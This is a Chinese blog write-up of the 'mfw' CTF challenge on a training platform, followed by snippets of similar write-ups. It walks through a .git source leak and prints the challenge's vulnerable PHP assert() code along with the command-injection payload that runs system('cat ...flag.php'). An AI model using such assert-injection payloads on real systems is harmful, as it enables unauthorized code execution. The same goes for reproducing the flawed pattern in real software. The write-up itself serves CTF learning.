攻防世界-mfw-(详细操作)做题笔记

最新推荐文章于 2024-05-26 12:46:39 发布
最新推荐文章于 2024-05-26 12:46:39 发布
阅读量5k 收藏 21
点赞数 6
分类专栏: 攻防世界 web 高手篇 文章标签: git github
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43715020/article/details/125312071
版权

如有不对的地方,还请各位大佬指正,下面开始正式做题:

 进入题目以后可以点击三个网页,这三个网页其中有一个提示我们git、php、Bootstrap、看到git的时候就可以联想到git泄露了,具体的git泄露知识请看这里:WEB安全-常见源码泄露 | wh1te

在网页后面添加http://111.200.241.244:58896/.git


可见存在git漏洞的,这时候就可以利用python的githacker库下载泄漏的文件。下载的系统是kali。

 我们用kali打开下载后的文档,发现当中有一个叫做flag的文档,但是查看以后发现什么都没有,应该是需要经过游览器特定的转换才能够看到该文件

翻阅了所有的文档以后并没有发现值得分析的文件,除了开头下载的index.php 文件中包含有代码部分

查看代码前我们需要知道:

assert()函数其实是一个断言函数。

assert:

  这个函数在php语言中是用来判断一个表达式是否成立。返回true or false;

        assert ( mixed $assertion [, string $description ] ) : bool

  如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

strpos() 函数查找字符串在另一字符串中第一次出现的位置,如果没有找到则返回flase,

<?php

if (isset($_GET['page'])) {  //判断参数page是否为空
	$page = $_GET['page'];
} else {    //为空输出page=home
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");  //查找$file
中..第一次出现的位置,查找成功则返回true,失败则返回flase,
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>
<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		
		<title>My PHP Website</title>
		
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
	</head>
	<body>
		<nav class="navbar navbar-inverse navbar-fixed-top">
			<div class="container">
		    	<div class="navbar-header">
		    		<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
		            	<span class="sr-only">Toggle navigation</span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		            	<span class="icon-bar"></span>
		          	</button>
		          	<a class="navbar-brand" href="#">Project name</a>
		        </div>
		        <div id="navbar" class="collapse navbar-collapse">
		          	<ul class="nav navbar-nav">
		            	<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
		            	<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
		            	<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
						<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
		          	</ul>
		        </div>
		    </div>
		</nav>
		
		<div class="container" style="margin-top: 50px">
			<?php
				require_once $file;
			?>
			
		</div>
		
		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
		<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
	</body>
</html>

 这里的关键代码是

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

 由于文件并没有对输入的字符进行过滤,所以可以进行语句闭合修改语句原本的意思,构建的payload:   /?page=');//                                            #双斜杠 " // " 再php中表示注释

 由于之前git漏洞下载对文件,我们已经知道了flag位于/templates/flag.php路径下,所以payload的构建可以直接一步到位,不用再用system('ls+xxx')回显路径,最后的

payload:    /?page=').system('cat+./templates/flag.php');//            

             

 FLAG: cyberpeace{0efc24240f66f1b3558c82b442cff2fa}

【网络安全 | CSAW】攻防世界mfw解题详析(Git泄露+命令执行)
等风来
05-29 6502
Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管理系统,并将其部署到生产环境中以维护其代码库。通过枚举工具或搜索引擎来查找带有.git文件夹的存储库,以获取包含未加密密码、凭据和敏感信息的站点代码库。由于该代码仅对目录遍历进行防范,因此可构造POC,执行系统命令。文件夹被直接部署到线上环境中,这可能会导致Git泄露问题。下载站点存储库的整个代码历史记录和配置信息。然而,在配置不当的情况下,可能会导致。由于下载得到的文件中,
攻防世界mfw(.git文件泄露)
2302_79800344的博客
04-09 968
【代码】【攻防世界mfw(.git文件泄露 + )
攻防世界----mfw
Red Rapefruit
08-04 3098
攻防世界----mfw 题目描述: 页面描述 解题思路 观察上图,我们可以获得两个比较重要的信息 1.该网站是用git托管源码,以及用PHP编写 2.有一个flag文件(猜测后缀为.PHP) 怀疑存在.git源码泄露,于是尝试访问或者是dirsearch扫描目录 http://220.249.52.133:47363 /.git 利用githack下载源码,详细代码自己发现,获得以下的信息 1.关键的代码 2.template目录下存在flag.php文件(你可以尝试直接cat一下) <?ph
攻防世界——mfw
m0_62063669的博客
06-23 1772
攻防世界——mfw当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。发现有Git,可能是Git泄露,直接/.git 确实存在git泄露那我们使用GitHack还原在templates目录下发现了flag.php,在index.php中发现关键代码strpos()函数查找".."在$file中第一次出现的位置。如果没有找到则返回falsefile_exists()函数检查$file是否存在assert()函数会将括号中的
mfw-攻防世界
szhangliwenya的博客
04-03 933
如果找到该字符串,它会返回该字符串在另一个字符串中第一次出现的位置(基于 0 的索引),如果没有找到,则返回。在生产环境中,为了提高性能,通常会将断言禁用,因为每次断言都需要检查一个条件,这可能会带来额外的开销。这是一个注释,提醒开发者 '..' 在文件路径中可能是危险的,因为它可能允许目录遍历攻击。函数会返回该子串的位置,否则返回 false。这是一个注释,表示接下来的代码可能需要优化或改进,使其看起来更整洁或更易于理解。设置)来执行不同的操作,这通常包括显示一个警告或错误消息,甚至终止脚本的执行。
攻防世界mfw_攻防世界-Web-mfw
weixin_29054399的博客
01-14 251
题目信息:image.png工具:GitHack,dirsearch知识点:git漏洞、代码审计打开题目场景,检查网站,发现这样一个页面image.png访问.git目录,疑似存在git源码泄露image.png再用dirsearch扫描,发现git源码泄露:使用 GitHack获取源码image.png得到源码index.php中关键代码如下if (isset($_GET['page'])) {...
mfw(攻防世界
m0_70819573的博客
02-25 426
2.在about界面上发现了Git,自然想到githack获取源码,发现index.php中的assert函数未经有任何过滤。1.打开环境,审计代码。3.利用payload。
攻防世界-mfw
weixin_46784800的博客
11-24 3966
攻防世界-mfwGit源码泄露assert函数漏洞题目分析 Git源码泄露 ​ 开发人员会使用 git 进行版本控制,对站点自动部署。但如果配置不当,可能会将 .git 文件夹直接部署到线上环境,这就引起了 git 泄露漏洞,我们可以利用这个漏洞直接获得网页源码 assert函数漏洞 ​ assert()函数导致的代码执行漏洞大多是因为载入缓存或者模板以及对变量的处理不严格导致,比如直接把一个外部可控的参数拼接到模板里面,然后调用这两个函数去当成 PHP 代码执行。 题目分析 进入靶场后,发现网站存在三个
攻防世界-mfw
weixin_64659753的博客
05-26 406
攻防世界-mfw
攻防世界 mfw
沐目的博客
07-24 1972
集训第四周 星期一到星期三 星期一 序列化的目的是为了将某些对象存储到磁盘上,从而长期保存,例如最常见的是Web服务器中的Session对象,当有 10万用户并发访问,就有可能出现10万个Session对象,内存可能吃不消,于是Web容器就会把一些seesion先序列化到硬盘中,等要用了,再把保存在硬盘中的对象还原到内存中。 星期三 md5弱比较,为0e开头的会被识别为科学记数法,结果均为0 md...
攻防世界mfw_攻防世界--web高级writeup
weixin_29963537的博客
01-14 233
根据大佬们的writeup作出来后,自我整理下知识点及分类php目录htmlmfw git泄露app 注意 page=about ,能够传数据且用git写可能有git泄露传flag为空,表明有文件,若是报错,是没有webstorm git泄露函数 查看flag.php没有东西查看index.php page没有通过任何过滤和处理,因此能够传递参数闭合strpos函数设置page为'.system...
web萌新ctf练习--攻防世界--mfw
qq_31677377的博客
06-04 1236
web萌新ctf练习–攻防世界mfw 题目 题目没有给hint 打开网页 习惯的查看源代码,发现一个可以的连接?page=flag 打开这个网页,是个空的。然后再在网页上点啊点,在about页面下发现了一些信息,可能存在git信息泄露 尝试输入/.git/,果然有东西 然后用Githack工具,拉下网站源码 依次点开各个php,没有直接写有flag的信息。再回头看index.php ...
攻防世界】十八 --- mfw --- git源码泄露
qq_43168364的博客
12-29 534
题目 ---- mfw 一、writeup 主页中抓包,提示flag在:?page=flag 中 这里考的不是文件包含,在这个页面提示使用了git,考的是git源代码泄露,访问:220.249.52.134:40286/.git/ 也可以使用dirsearch,命令:python3 dirsearch.py -u http://220.249.52.134:40286/ -e php 可访问的目录中没有有用的资源,使用GitHack.py 脚本导出所有的备份文件,执行:python2 GitHack.
攻防世界-web-mfw
wuh2333的博客
06-28 725
攻防世界mfw
攻防世界 mfwGit源码泄露与命令执行漏洞)
Welcome To Myon'Blog !
06-01 2495
Git 源码泄露: 1、strpos() 函数 2、assert()函数 3、file_exists() 函数 4、die()函数 代码审计: 命令执行漏洞:
攻防世界mfw--详细笔记
jkhdjkasd的博客
07-26 1197
攻防世界mfw--详细笔记
攻防世界Web-mfw
05-14 443
题目来源csaw-ctf-2016-quals 使用GitHack assert() 检查一个断言是否为 FALSE strpos() 函数查找字符串在另一字符串中第一次出现的位置。 file_exists() 函数检查文件或目录是否存在。 payload: ?/page= about.php', '123') === false and syste...
攻防世界】十八、mfw
Hi~ 土拨鼠
10-19 831
步骤 打开所给场景: 点击发现一共有三个页面,是靠传递page参数来显示内容 查看网页源代码发现还有隐藏的flag页面,但是啥都不显示 试着输入其他字符则显示错误页面 很可能设置的是白名单,回过头来发现about页面说明使用了git,试着输入.git查看有没有源码泄露 确定了有git源码泄露,不知道为啥刷新了一下样式变了 使用lijiejie的工具GitHack:https://github.com/lijiejie/GitHack来下载源码 注意:代码使用python2写的,记得使用正.
攻防世界mfw
最新发布
04-03
### 关于攻防世界 MFW 平台及其活动 #### 攻防世界简介 攻防世界是一个专注于网络安全技术实践与学习的在线平台,旨在通过模拟真实环境中的漏洞利用和防御场景来提升用户的实战能力。该平台提供了多种难度级别的挑战题目,覆盖 Web 安全、逆向工程、密码学等多个领域。 #### MFW 活动背景 MFW攻防世界中的一项特定活动或挑战模块,主要围绕 Web 渗透测试展开。参与者需要通过对目标站点进行分析、挖掘潜在的安全漏洞并加以利用,从而完成指定的任务目标——通常是获取隐藏的 `flag` 值[^1]。 #### 技术细节解析 在已知的信息中提到,MFW 的某些关卡设计涉及到了 PHP 代码执行漏洞。例如,在某次活动中发现了一处注释掉但未被有效移除的敏感变量 `$FLAG`,其值为 `cyberpeace{d98815545c367222f2e6db4cd679fe18}`[^2]。这表明开发者可能遗留了调试信息或者配置错误,进而暴露了关键数据。 另外还提到了一种攻击手法:通过构造特殊形式的输入参数(即所谓的 **payload**),可以触发服务器端的断言函数 `assert()` 将传入的内容解释成合法PHP语句运行。具体实例包括调用系统命令显示文件内容的操作: ```php ?page=abc') or system("cat templates/flag.php");// ``` 上述方法成功实现了远程代码执行的效果,使得参赛者能够读取到存储有最终答案的位置[^4]。 #### 如何参与此类竞赛? 对于希望加入像攻防世界这样的 CTF (Capture The Flag) 类型比赛的新手来说,建议遵循以下几点准备策略: - 学习基础理论知识,比如常见的 web 应用程序缺陷分类以及对应的修复措施; - 练习实际操作技巧,多尝试解决不同类型的练习题以积累经验; - 加强编程技能训练,熟悉至少一门主流脚本语言以便快速编写工具辅助解题过程; 最后提醒各位爱好者注意遵守赛事规则,在授权范围内开展研究工作,共同维护良好的网络生态环境。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值